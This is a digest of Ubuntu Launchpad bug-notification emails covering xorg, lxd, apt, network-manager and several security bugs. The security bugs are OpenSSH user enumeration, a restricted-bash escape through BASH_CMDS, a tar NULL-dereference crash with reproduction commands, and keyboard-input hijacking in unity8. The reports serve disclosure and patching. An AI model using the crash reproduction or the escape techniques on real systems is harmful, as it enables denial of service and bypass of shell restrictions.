Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1822335] Re: test general

[Seth Arnold]

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1822335

Title:
  test general

Status in xorg package in Ubuntu:
  New

Bug description:
   test general. thank you

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: xorg 1:7.7+19ubuntu7.1
  ProcVersionSignature: Ubuntu 4.15.0-47.50-generic 4.15.18
  Uname: Linux 4.15.0-47-generic x86_64
  .tmp.unity_support_test.0:
   
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: None
  Date: Fri Mar 29 15:34:45 2019
  DistUpgraded: Fresh install
  DistroCodename: bionic
  DistroVariant: ubuntu
  GraphicsCard:
   Intel Corporation 3rd Gen Core processor Graphics Controller [8086:0166] 
(rev 09) (prog-if 00 [VGA controller])
 Subsystem: Lenovo 3rd Gen Core processor Graphics Controller [17aa:21f3]
  InstallationDate: Installed on 2019-03-09 (19 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  MachineType: LENOVO 2349IP5
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-47-generic 
root=UUID=29ebe1d0-5356-4a16-ac13-b48aa7be1b2e ro quiet splash vt.handoff=1
  Renderer: Software
  SourcePackage: xorg
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 01/09/2013
  dmi.bios.vendor: LENOVO
  dmi.bios.version: G1ET91WW (2.51 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 2349IP5
  dmi.board.vendor: LENOVO
  dmi.board.version: Win8 Pro DPK TPG
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvrG1ET91WW(2.51):bd01/09/2013:svnLENOVO:pn2349IP5:pvrThinkPadT430:rvnLENOVO:rn2349IP5:rvrWin8ProDPKTPG:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.family: ThinkPad T430
  dmi.product.name: 2349IP5
  dmi.product.version: ThinkPad T430
  dmi.sys.vendor: LENOVO
  version.compiz: compiz 1:0.9.13.1+18.04.20180302-0ubuntu1
  version.libdrm2: libdrm2 2.4.95-1~18.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 18.2.8-0ubuntu0~18.04.2
  version.libgl1-mesa-glx: libgl1-mesa-glx 18.2.8-0ubuntu0~18.04.2
  version.xserver-xorg-core: xserver-xorg-core 2:1.19.6-1ubuntu4.2
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.5-1ubuntu1
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:18.0.1-1
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20171229-1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.15-2
  xserver.bootTime: Fri Mar 22 09:18:08 2019
  xserver.configfile: default
  xserver.errors:
   open /dev/dri/card0: No such file or directory
   open /dev/dri/card0: No such file or directory
   Screen 0 deleted because of no matching config section.
   AIGLX: reverting to software rendering
  xserver.logfile: /var/log/Xorg.0.log
  xserver.outputs:
   
  xserver.version: 2:1.19.6-1ubuntu4.2

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1822335/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

[Seth Arnold]

root: sudo apt update && sudo apt upgrade

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629

Title:
  CVE-2018-15473 - User enumeration vulnerability

Status in openssh package in Ubuntu:
  Fix Released
Status in openssh source package in Trusty:
  Fix Released
Status in openssh source package in Xenial:
  Fix Released
Status in openssh source package in Bionic:
  Fix Released
Status in openssh source package in Cosmic:
  Fix Released

Bug description:
  https://nvd.nist.gov/vuln/detail/CVE-2018-15473

  OpenSSH through 7.7 is prone to a user enumeration vulnerability due
  to not delaying bailout for an invalid authenticating user until after
  the packet containing the request has been fully parsed, related to
  auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

  Fixed in Debian: https://www.debian.org/security/2018/dsa-4280

  Currently pending triage? https://people.canonical.com/~ubuntu-
  security/cve/2018/CVE-2018-15473.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1794629/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1807856] Re: During do-release-upgrade from 18.04 to 18.10: package lxd 3.0.2-0ubuntu1~18.04.1 failed to install/upgrade: new lxd package pre-installation script subprocess retur

[Seth Arnold]

I added apport for the python2 -> python3 bug.

Thanks

** Also affects: apport (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1807856

Title:
  During do-release-upgrade from 18.04 to 18.10: package lxd
  3.0.2-0ubuntu1~18.04.1 failed to install/upgrade: new lxd package pre-
  installation script subprocess returned error exit status 1

Status in apport package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  Confirmed

Bug description:
  [Impact]

  Upgrading apt version of lxd to snap version during do-release-upgrade
  failed.

  I attempted to update my ubuntu server 18.04 system to 18.10 as root:

  apt update
  apt dist-upgrade -y
  apt autoremove -y
  do-release-upgrade

  I have an existing LXD installed via apt, and running containers.

  It asked me which snap LXD to upgrade to, and I selected "latest".

  Console log:

  ==> Installing the LXD snap from the latest track for ubuntu-18.10
  error: cannot perform the following tasks:
  - Run install hook of "lxd" snap if present (run hook "install": cannot 
perform operation: mount /var/lib/snapd/hostfs/var/lib/lxd /var/lib/lxd -o 
nosuid,nodev,noexec,rbind,rslave: Permission denied)
  dpkg: error processing archive 
/tmp/apt-dpkg-install-gdCSiW/32-lxd_1%3a0.4_all.deb (--unpack):
   new lxd package pre-installation script subprocess returned error exit 
status 1
  Traceback (most recent call last):
  File 
"/usr/lib/python3/dist-packages/apt/cache.py", line 265, in __getitem__
    
  rawpkg = self._cache[key]
    
   KeyError: 
'32-lxd'

  During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File 
"/usr/lib/python3/dist-packages/apport/packaging_impl.py", line 126, in _apt_pkg
    
 return 
self._cache()[package]
    

File "/usr/lib/python3/dist-packages/apt/cache.py", line 267, in 
__getitem__
    raise KeyError('The cache has no 
package named %r' % key)
    
 KeyError: "The cache has no package named '32-lxd'"

  During handling of the above exception, another exception occurred:

   Traceback (most recent call last):
   File "/usr/share/apport/package_hook", 
line 48, in 
    
  pr['SourcePackage'] = 
apport.packaging.get_source(options.package)
    

  File "/usr/lib/python3/dist-packages/apport/packaging_impl.py", line 
159, in get_source
     if 
self._apt_pkg(package).installed:
    
   File "/usr/lib/python3/dist-packages/apport/packaging_impl.py", line 
128, in _apt_pkg
    

raise ValueError('package %s does not exist' % package)
   ValueError: package 32-lxd does not exist
    Preparing to unpack 
.../33-open-iscsi_2.0.874-5ubuntu9.1_amd64.deb ...
  Unpacking open-iscsi (2.0.874-5ubuntu9.1) over (2.0.874-5ubuntu2.4) ...
  Preparing to unpack .../34-poppler-data_0.4.9-2_all.deb ...
  Unpacking poppler-data (0.4.9-2) over (0.4.8-2) ...
  Preparing to unpack .../35-tasksel-data_3.34ubuntu12_all.deb ...
  Unpacking tasksel-data (3.34ubuntu12) over (3.34ubuntu11) ...
  Preparing to unpack .../36-tasksel_3.34ubuntu12_all.deb ...
  Unpacking tasksel (3.34ubuntu12) over (3.34ubuntu11) ...
  Preparing to unpack .../37-libsepol1_2.8-1_amd64.deb ...
  Unpacking libsepol1:amd64 (2.8-1) over (2.7-1) ...
  Errors were encountered while processing:
   /tmp/apt-dpkg-install-gdCSiW/32-lxd_1%3a0.4_all.deb
  Exception during pm.DoInstall():  E:Sub-process /usr/bin/dpkg returned an 
error code (1)

  *** 

[Touch-packages] [Bug 1803441] Re: BASH_CMDS is writable in restricted bash shells (fixed upstream, need to backport patch)

[Seth Arnold]

I'm sorry Riccardo, I didn't notice the two separate BASH_CMDS issues when 
I filed the request. The only mention in the changelog is:

> This document details the changes between this version, bash-4.4-beta2,
> and the previous version, bash-4.4-rc1.
>$
> [...]
>$
> d.  Fixed a bug that allowed assignments to BASH_CMDS when the shell was
> in restricted mode.

http://git.savannah.gnu.org/cgit/bash.git/tree/CHANGES?h=bash-4.4-testing#n65

I did not find a single well-defined patch or commit for this, so
completely overlooked that there are multiple issues.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1803441

Title:
  BASH_CMDS is writable in restricted bash shells (fixed upstream, need
  to backport patch)

Status in bash package in Ubuntu:
  New

Bug description:
  In 14.04 LTS, the BASH_CMDS variable is writable in rbash. This allows
  a trivial escape from rbash to run arbitrary shell commands.

  This issue is fixed upstream:
  http://git.savannah.gnu.org/cgit/bash.git/tree/CHANGES?h=bash-4.4-testing#n65

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1803441/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1821634] [NEW] BZ2_bzread: [...] Read error (-5: DATA_ERROR_MAGIC)

[Seth Arnold]

Public bug reported:

I have apt configured to load a wide variety of sources; my apt is using
a local squid-deb-proxy on the same system, and the source that is
failing is hosted on an archive mirror on my LAN.

Today I noticed unexpected results from apt-get update:

# apt-get update
Hit:1 http://wopr/ubuntu bionic InRelease
Hit:2 http://wopr/ubuntu bionic-updates InRelease
[...]
Get:45 http://archive.canonical.com/ubuntu precise Release.gpg [181 B]   
Hit:46 http://ftp.debian.org/debian stretch Release 
 
Ign:26 http://wopr/ubuntu precise Release.gpg  
Ign:49 http://wopr/ubuntu precise/restricted Sources
Ign:50 http://wopr/ubuntu precise/multiverse Sources
Ign:48 http://wopr/ubuntu precise/main Sources  
Hit:49 http://wopr/ubuntu precise/restricted Sources
Ign:50 http://wopr/ubuntu precise/multiverse Sources
Hit:51 http://wopr/ubuntu precise/universe Sources
Ign:51 http://wopr/ubuntu precise/universe Sources 
Err:50 http://wopr/ubuntu precise/multiverse Sources   
  Could not open file 
/var/lib/apt/lists/partial/wopr_ubuntu_dists_precise_multiverse_source_Sources.bz2
 - open (13: Permission denied) [IP: 127.0.0.1 8000]
Ign:29 http://ftp.debian.org/debian unstable InRelease
Ign:48 http://wopr/ubuntu precise/main Sources  
Ign:34 http://ftp.debian.org/debian testing InRelease
Ign:45 http://archive.canonical.com/ubuntu precise Release.gpg
Hit:55 http://archive.canonical.com/ubuntu precise/partner Sources  

Ign:55 http://archive.canonical.com/ubuntu precise/partner Sources  

Hit:55 http://archive.canonical.com/ubuntu precise/partner Sources  

Fetched 670 kB in 7s (101 kB/s) 

Reading package lists... Done
W: GPG error: http://wopr/ubuntu precise-updates InRelease: The following 
signatures were invalid: 630239CC130E1A7FD81A27B140976EAF437D05B5
W: GPG error: http://wopr/ubuntu precise-security InRelease: The following 
signatures were invalid: 630239CC130E1A7FD81A27B140976EAF437D05B5
W: GPG error: http://wopr/ubuntu precise-proposed InRelease: The following 
signatures were invalid: 630239CC130E1A7FD81A27B140976EAF437D05B5
W: GPG error: http://wopr/ubuntu precise Release: The following signatures were 
invalid: 630239CC130E1A7FD81A27B140976EAF437D05B5
W: GPG error: http://ftp.debian.org/debian unstable InRelease: The following 
signatures couldn't be verified because the public key is not available: 
NO_PUBKEY 7638D0442B90D010 NO_PUBKEY 04EE7237B7D453EC
W: GPG error: http://ftp.debian.org/debian testing InRelease: The following 
signatures couldn't be verified because the public key is not available: 
NO_PUBKEY 7638D0442B90D010 NO_PUBKEY 04EE7237B7D453EC
W: GPG error: http://archive.canonical.com/ubuntu precise Release: The 
following signatures were invalid: 630239CC130E1A7FD81A27B140976EAF437D05B5
E: Failed to fetch http://wopr/ubuntu/dists/precise/multiverse/source/Sources  
Could not open file 
/var/lib/apt/lists/partial/wopr_ubuntu_dists_precise_multiverse_source_Sources.bz2
 - open (13: Permission denied) [IP: 127.0.0.1 8000]
E: Failed to fetch http://wopr/ubuntu/dists/precise/universe/source/Sources.gz  
BZ2_bzread: 
/var/lib/apt/lists/partial/wopr_ubuntu_dists_precise_universe_source_Sources.bz2
 Read error (-5: DATA_ERROR_MAGIC)
E: Some index files failed to download. They have been ignored, or old ones 
used instead.


The unexpected lines are the E: lines.


The permission denied line doesn't make sense to me because the permissions 
*after* the apt-get update run look fine:

# namei -l 
/var/lib/apt/lists/partial/wopr_ubuntu_dists_precise_multiverse_source_Sources.bz2
f: 
/var/lib/apt/lists/partial/wopr_ubuntu_dists_precise_multiverse_source_Sources.bz2
drwxr-xr-x root root /
drwxr-xr-x root root var
drwxr-xr-x root root lib
drwxr-xr-x root root apt
drwxr-xr-x root root lists
drwx-- _apt root partial
lrwxrwxrwx root root wopr_ubuntu_dists_precise_multiverse_source_Sources.bz2 -> 
/var/lib/apt/lists/wopr_ubuntu_dists_precise_multiverse_source_Sources
drwxr-xr-x root root   /
drwxr-xr-x root root   var
drwxr-xr-x root root   lib
drwxr-xr-x root root   apt
drwxr-xr-x root root   lists
-rw-r--r-- root root   wopr_ubuntu_dists_precise_multiverse_source_Sources

The DATA_ERROR_MAGIC makes enough sense -- the symlink name has .bz2,
but the file it points to is a plaintext file:

2f0deae62e2cf7e5257bbd858cb0bf2a94122c4eb82be13e13768d0b9ce84c9e
/var/lib/apt/lists/wopr_ubuntu_dists_precise_multiverse_source_Sources


This hash is listed in my mirror's Release file:

$ grep 2f0deae62e2cf7e5257bbd858cb0bf2a94122c4eb82be13e13768d0b9ce84c9e Release
 2f0deae62e2cf7e5257bbd858cb0bf2a94122c4eb82be13e13768d0b9ce84c9e   
628753 multiverse/source/Sources

[Touch-packages] [Bug 1803441] Re: BASH_CMDS is writable in restricted bash shells (fixed upstream, need to backport patch)

[Seth Arnold]

CVE-2019-9924

Thanks

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-9924

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1803441

Title:
  BASH_CMDS is writable in restricted bash shells (fixed upstream, need
  to backport patch)

Status in bash package in Ubuntu:
  New

Bug description:
  In 14.04 LTS, the BASH_CMDS variable is writable in rbash. This allows
  a trivial escape from rbash to run arbitrary shell commands.

  This issue is fixed upstream:
  http://git.savannah.gnu.org/cgit/bash.git/tree/CHANGES?h=bash-4.4-testing#n65

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1803441/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1821364] Re: xfce4 install on Ubuntu 18.04 has no polkit agent

[Seth Arnold]

** Package changed: dbus (Ubuntu) => xfce4 (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1821364

Title:
  xfce4 install on Ubuntu 18.04 has no polkit agent

Status in xfce4 package in Ubuntu:
  New

Bug description:
  The problem was evident as en error message when trying run 'Language
  Support' (gnome-language-selector) after install. (This was the
  advised way to get the Atom spell-checker working).

  Error described here: https://askubuntu.com/questions/1031319
  /language-support-in-18-04-not-working-org-freedesktop-policykiterror-
  failed/1127862#1127862

  It occurred on a fresh install of Ubuntu 18.04 after installing xfce4.

  No PolicyKit Authentication Agent was installed - or at least not one
  that xfce seemed to recognise.

  I solved the problem by installing one:

  $ sudo apt install policykit-1-gnome

  That installed the package: /usr/lib/policykit-1-gnome/polkit-gnome-
  authentication-agent-1.

  It seemed to update the autostart list.

  Though there is such a thing as 'xfce-polkit' and 'xfce-polkit-git', I
  could not see them on my machine and Debian [reports][3], in it's
  account of the package policykit-1-gnome, that xfce still uses the
  gnome polkit agent:

  "This implementation was originally designed for GNOME 2, but most
  GNOME-based desktop environments, including GNOME 3, GNOME Flashback,
  and MATE, have their own built-in PolicyKit agents and no longer use
  this one. The remaining users of this implementation are Cinnamon,
  XFCE and Unity."

  (https://packages.debian.org/sid/policykit-1-gnome)

  It is worth noting that the terminal emulator that comes default in
  Ubuntu and is still default after installing xfce (gnome terminal)
  would not run polkit-gnome-authentication-agent-1 after install. I
  understand it may have been necessary, perhaps ironically, to run it
  an an xterm. I didn't attempt this. But all was well after restart.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xfce4/+bug/1821364/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1810241] Re: NULL dereference when decompressing specially crafted archives

[Seth Arnold]

Use CVE-2019-9923.

Thanks

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-9923

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to tar in Ubuntu.
https://bugs.launchpad.net/bugs/1810241

Title:
  NULL dereference when decompressing specially crafted archives

Status in tar package in Ubuntu:
  New

Bug description:
  Hi,

  Fuzzing tar with checksums disabled reveals a NULL pointer dereference
  when parsing certain archives that have malformed extended headers.
  This affects tar from (at least) Trusty, Bionic and Cosmic. I haven't
  tested Xenial's version.

  A test case with fixed checksums is attached. To avoid breaking
  anything that looks inside tar archives, I have converted it to text
  with xxd. To reproduce:

  $ xxd -r gnutar-crash.tar.txt gnutar-crash.tar
  $ tar Oxf gnutar-crash.tar 
  tar: Ignoring unknown extended header keyword 'GNU.sparse.minTr'
  tar: Malformed extended header: missing length
  Segmentation fault (core dumped)

  I have also attached a patch against the latest upstream git and
  against 1.30 (in Cosmic). This fixes the issue by detecting the null
  result before it is dereferenced.

  Regards,
  Daniel

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1594863] Re: OSK consideration for life cycle changes in unity8 windowed mode

[Seth Arnold]

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-keyboard in Ubuntu.
https://bugs.launchpad.net/bugs/1594863

Title:
  OSK consideration for life cycle changes in unity8 windowed mode

Status in qtmir package in Ubuntu:
  In Progress
Status in ubuntu-keyboard package in Ubuntu:
  In Progress

Bug description:
  Access to the On-Screen-Keyboard, as provided by Maliit, is predicated
  on the application being “active”. Unity8’s life cycle management, in
  small screen devices had always stopped (via SIGSTOP) any application
  which was not the top most application. From a security perspective
  this provided protection from a nefarious app from taking over, while
  in the background, to the input stream of the user’s interaction with
  the top-most active application. With the advent of convergence,
  unity8’s life cycle management has grown to accommodate both small
  screen and large screen device configurations. For large screens,
  “windowed mode” is a mode that can be auto & user activated based on
  screen size and presence of keyboard/mouse. During “windowed mode” the
  life cycle permits applications to remain “active” if they are visible
  but not the top-most or “focused” application (the user experience
  example is working on a document in the top-most window while watching
  video in an active but unfocused window). Remaining active, while not
  in the user’s “focus” creates a risk in that an application could
  connect to Maliit and take over the user’s input intended for the
  focused application. So while this is bad, the top-most application
  will not reflect the input, as it would be consumed by the nefarious
  app. It’s worth noting this risk does not exist with hardware keyboard
  input, which is the largest majority of expected use case. Security
  team would classify the severity as “medium” but we need to treat with
  priority and sensitivity due to the marketing investment we have made
  in touting the security of Unity8/Mir.

  our plan of attack is covered in this document
  
https://docs.google.com/document/d/1Y7p_8jee6Kiv4KQwZBClFl23RGFVFfBKoOcMh9ymdqw

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/qtmir/+bug/1594863/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1821052] Re: No connexion with mobile broadband

[Seth Arnold]

On Wed, Mar 20, 2019 at 07:25:35PM -, Edhelharn wrote:
> My sources.list file (updated) :
> 
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic main restricted
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic-updates main restricted
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic universe
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic-updates universe
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic multiverse
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic-updates multiverse
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic-backports main restricted 
> universe multiverse
> #deb http://security.ubuntu.com/ubuntu bionic-security main restricted
> #deb http://security.ubuntu.com/ubuntu bionic-security universe
> #deb http://security.ubuntu.com/ubuntu bionic-security multiverse
> deb http://fr.archive.ubuntu.com/ubuntu/ bionic-proposed restricted main 
> multiverse universe

You're currently configured to install *only* packages from bionic's
-proposed pocket. Why are the other sources disabled?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1821052

Title:
  Unavailable connexion with mobile broadband DW5811e Snapdragon™ X7 LTE

Status in network-manager package in Ubuntu:
  New

Bug description:
  Hello,

  I'm trying to connect internet with mobile broadband module card
  DW5811e Snapdragon™ X7 LTE but when I finished to set in GUI, asked
  informations, anything happens. (screenshot join) Message in Network-
  Manager says "unavailable".

  I am using Ubuntu 18.04.2 LTS.

  I tested the module under Linux Mint LMDE 3 Cindy with a LIVE USB and
  it works good.

  I can give some information about the card and connection :

  sudo mmcli -m 0

  /org/freedesktop/ModemManager1/Modem/0 (device id 'hidden by me')
-
Hardware |   manufacturer: 'Dell'
 |  model: 'MBIM [413C:81B6]'
 |   revision: 'SWI9X30C_02.24.05.06'
 |  supported: 'gsm-umts, lte'
 |current: 'gsm-umts, lte'
 |   equipment id: 'hidden by me'
-
System   | device: '/sys/devices/pci:00/:00:14.0/usb2/2-2'
 |drivers: 'cdc_mbim'
 | plugin: 'Dell'
 |   primary port: 'cdc-wdm1'
 |  ports: 'cdc-wdm1 (mbim), wwp0s20f0u2i12 (net)'
-
Numbers  |   own : 'unknown'
-
Status   |   lock: 'none'
 | unlock retries: 'sim-pin2 (3)'
 |  state: 'disabled'
 |power state: 'on'
 |access tech: 'unknown'
 | signal quality: '0' (cached)
-
Modes|  supported: 'allowed: 3g, 4g; preferred: none'
 |current: 'allowed: 3g, 4g; preferred: none'
-
Bands|  supported: 'unknown'
 |current: 'unknown'
-
IP   |  supported: 'ipv4, ipv6, ipv4v6'
-
3GPP |   imei: '(hidden by me)'
 |  enabled locks: 'fixed-dialing'
 |operator id: 'unknown'
 |  operator name: 'unknown'
 |   subscription: 'unknown'
 |   registration: 'unknown'
-
SIM  |   path: '/org/freedesktop/ModemManager1/SIM/0'

-
Bearers  |  paths: 'none'

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: network-manager-config-connectivity-ubuntu 1.10.6-2ubuntu1.1
  ProcVersionSignature: Ubuntu 4.18.0-16.17~18.04.1-generic 4.18.20
  Uname: Linux 4.18.0-16-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Mar 20 18:07:34 2019
  IfupdownConfig:
   # interfaces(5) file used by ifup(8) and ifdown(8)
   auto lo
   iface lo inet loopback
  InstallationDate: Installed on 2019-03-15 (4 days ago)
  InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 
(20190210)
  IpRoute:
   default via 192.168.42.129 dev enp0s20f0u9 proto dhcp metric 100 
   169.254.0.0/16 dev enp0s20f0u9 scope link metric 1000 
   192.168.42.0/24 dev enp0s20f0u9 proto kernel scope link src 192.168.42.245 
metric 100
  NetworkManager.state:
   [main]
   NetworkingEnabled=true
   WirelessEnabled=true
   WWANEnabled=false
  PackageArchitecture: all
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=fr_FR.UTF-8
   SHELL=/bin/bash
  SourcePackage: network-manager
  UpgradeStatus: No upgrade log present (probably fresh install)
  nmcli-con:
   NAME UUID  TYPE  
TIMESTAMP   TIMESTAMP-REAL  AUTOCONNECT  AUTOCONNECT-PRIORITY  

[Touch-packages] [Bug 1821052] Re: No connexion with mobile broadband

[Seth Arnold]

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1821052

Title:
  No connexion with mobile broadband

Status in network-manager package in Ubuntu:
  New

Bug description:
  Hello,

  I'm trying to connect internet with mobile broadband module card
  DW5811e Snapdragon™ X7 LTE but when I finished to set in GUI, asked
  informations, anything happens. (screenshot join) Message in Network-
  Manager says "unavailable".

  I am using Ubuntu 18.04.2 LTS.

  I tested the module under Linux Mint LMDE 3 Cindy with a LIVE USB and
  it works good.

  I can give some information about the card and connection :

  sudo mmcli -m 0

  /org/freedesktop/ModemManager1/Modem/0 (device id 'hidden by me')
-
Hardware |   manufacturer: 'Dell'
 |  model: 'MBIM [413C:81B6]'
 |   revision: 'SWI9X30C_02.24.05.06'
 |  supported: 'gsm-umts, lte'
 |current: 'gsm-umts, lte'
 |   equipment id: 'hidden by me'
-
System   | device: '/sys/devices/pci:00/:00:14.0/usb2/2-2'
 |drivers: 'cdc_mbim'
 | plugin: 'Dell'
 |   primary port: 'cdc-wdm1'
 |  ports: 'cdc-wdm1 (mbim), wwp0s20f0u2i12 (net)'
-
Numbers  |   own : 'unknown'
-
Status   |   lock: 'none'
 | unlock retries: 'sim-pin2 (3)'
 |  state: 'disabled'
 |power state: 'on'
 |access tech: 'unknown'
 | signal quality: '0' (cached)
-
Modes|  supported: 'allowed: 3g, 4g; preferred: none'
 |current: 'allowed: 3g, 4g; preferred: none'
-
Bands|  supported: 'unknown'
 |current: 'unknown'
-
IP   |  supported: 'ipv4, ipv6, ipv4v6'
-
3GPP |   imei: '(hidden by me)'
 |  enabled locks: 'fixed-dialing'
 |operator id: 'unknown'
 |  operator name: 'unknown'
 |   subscription: 'unknown'
 |   registration: 'unknown'
-
SIM  |   path: '/org/freedesktop/ModemManager1/SIM/0'

-
Bearers  |  paths: 'none'

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: network-manager-config-connectivity-ubuntu 1.10.6-2ubuntu1.1
  ProcVersionSignature: Ubuntu 4.18.0-16.17~18.04.1-generic 4.18.20
  Uname: Linux 4.18.0-16-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Mar 20 18:07:34 2019
  IfupdownConfig:
   # interfaces(5) file used by ifup(8) and ifdown(8)
   auto lo
   iface lo inet loopback
  InstallationDate: Installed on 2019-03-15 (4 days ago)
  InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 
(20190210)
  IpRoute:
   default via 192.168.42.129 dev enp0s20f0u9 proto dhcp metric 100 
   169.254.0.0/16 dev enp0s20f0u9 scope link metric 1000 
   192.168.42.0/24 dev enp0s20f0u9 proto kernel scope link src 192.168.42.245 
metric 100
  NetworkManager.state:
   [main]
   NetworkingEnabled=true
   WirelessEnabled=true
   WWANEnabled=false
  PackageArchitecture: all
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=fr_FR.UTF-8
   SHELL=/bin/bash
  SourcePackage: network-manager
  UpgradeStatus: No upgrade log present (probably fresh install)
  nmcli-con:
   NAME UUID  TYPE  
TIMESTAMP   TIMESTAMP-REAL  AUTOCONNECT  AUTOCONNECT-PRIORITY  
READONLY  DBUS-PATH   ACTIVE  DEVICE   
STATE  ACTIVE-PATH SLAVE 
   Connexion filaire 2  eb77c09e-864c-349d-bd6b-6cb8895377fe  ethernet  
1553101500  mer. 20 mars 2019 18:05:00 CET  yes  4294966297
no/org/freedesktop/NetworkManager/Settings/4  yes enp0s20f0u9  
activated  /org/freedesktop/NetworkManager/ActiveConnection/2  --
   Connexion filaire 1  b2ad30fe-7283-3e17-b614-61743aae30d1  ethernet  
1553020238  mar. 19 mars 2019 19:30:38 CET  yes  4294966297
no/org/freedesktop/NetworkManager/Settings/1  no  --   --   
  --  --
  nmcli-nm:
   RUNNING  VERSION  STATE  STARTUP  CONNECTIVITY  NETWORKING  WIFI-HW  
WIFI WWAN-HW  WWAN 
   running  1.10.6   connected  started  full  enabled enabled  
enabled  enabled  disabled

To manage notifications about this bug 

